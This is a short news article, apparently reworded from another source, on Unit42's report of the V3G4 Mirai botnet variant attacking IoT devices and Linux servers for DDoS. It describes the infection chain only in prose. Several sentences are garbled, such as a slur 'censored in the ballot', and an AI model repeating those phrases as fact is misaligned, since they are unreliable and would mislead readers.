Attackers are using a new variant of the Mirai botnet, known as V3G4, to attack IoT devices and Linux-based servers.
On February 15, 2023, Unit42 security researchers at Palo Alto Networks published a recommendation for a new variant of the Mirai botnet, dubbed “V3G4”. In a Unit42 post, readers were warned that various campaigns used botnet malware to execute exploits that were tracked between July and December 2022.
In total, the attacker managed to exploit 13 security vulnerabilities, each of which could allow remote code execution to create a botnet. Unit42 wrote in its bulletin that when code is executed remotely, “the wget and curl utilities automatically run to download sample Mirai clients from the malicious infrastructure and then run the downloaded bot clients.”
Unit42 also informed readers that the same attacker is behind every attack. Moreover, the attacker used a racist slur in the attack, which was censored in the ballot. At the time of writing, no malicious service has been associated with a series of attacks.
This new variant of Mirai has been used to hack IoT devices and Linux-based servers. In the aforementioned newsletter, Unit42 wrote that V3G4 “targets Linux-based open servers and network devices” and also targets IoT devices to “carry out further attacks such as distributed denial-of-service (DDoS) attacks.” Unit42 also wrote that “once the client establishes a connection to the C2 server, the threat actor can issue commands to the client to launch DDoS attacks.” Botnets are commonly used in DDoS attacks to disrupt the typical Internet traffic flow of a server or website. This can cause the server or site to crash, making it temporarily unavailable to regular users.
Mirai malware has been a threat for years
Variants of the Mirai botnet have been repeatedly used in the past to launch malicious attacks since the first Mirai program appeared in 2016.
Mirai botnets attacked many well-known platforms, including Minecraft, Amazon, Netflix and PayPal. There is no doubt that this malware family poses a huge risk to online services.
Botnets are dangerous but effective attack vectors
Creating a network of zombie devices to carry out malicious exploits is a sophisticated but highly dangerous technique used by cybercriminals today, especially in DDoS attacks. We will certainly see more types of botnet malware appear in the future, perhaps from the creators of Mirai.
#Mirai #malware #variant #targets #IoT #devices #Linux #servers
❤ XOXO ❤